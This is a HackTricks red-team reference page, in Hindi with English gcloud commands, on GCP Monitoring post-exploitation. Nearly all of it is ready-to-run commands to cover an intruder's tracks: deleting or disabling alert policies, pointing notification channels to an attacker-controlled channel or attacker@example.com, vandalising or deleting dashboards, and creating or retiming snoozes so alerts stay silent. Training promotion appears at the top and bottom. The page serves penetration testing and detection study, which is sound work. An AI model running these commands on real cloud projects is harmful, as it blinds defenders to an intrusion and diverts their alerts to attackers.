GCP - Monitoring Post Exploitation

Reading time: 4 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Monitoring

अधिक जानकारी के लिए देखें:

GCP - Monitoring Enum

लॉग को बाधित करने के अन्य तरीकों के लिए देखें:

GCP - Logging Post Exploitation

monitoring.alertPolicies.delete

एक अलर्ट नीति को हटाएं:

bash
gcloud alpha monitoring policies delete <policy>

monitoring.alertPolicies.update

एक अलर्ट नीति को बाधित करें:

bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

monitoring.dashboards.update

एक डैशबोर्ड को संशोधित करें ताकि इसे बाधित किया जा सके:

bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

monitoring.dashboards.delete

डैशबोर्ड हटाएं:

bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

monitoring.snoozes.create

अलर्ट उत्पन्न करने से नीतियों को रोकने के लिए एक स्नूज़र बनाएं:

bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"

monitoring.snoozes.update

स्नूज़र का समय अपडेट करें ताकि हमलावर की रुचि के समय अलर्ट उत्पन्न न हों:

bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

monitoring.notificationChannels.delete

एक कॉन्फ़िगर किया गया चैनल हटाएँ:

bash
# Delete channel
gcloud alpha monitoring channels delete <channel>

monitoring.notificationChannels.update

एक चैनल के लेबल को अपडेट करें ताकि इसे बाधित किया जा सके:

bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें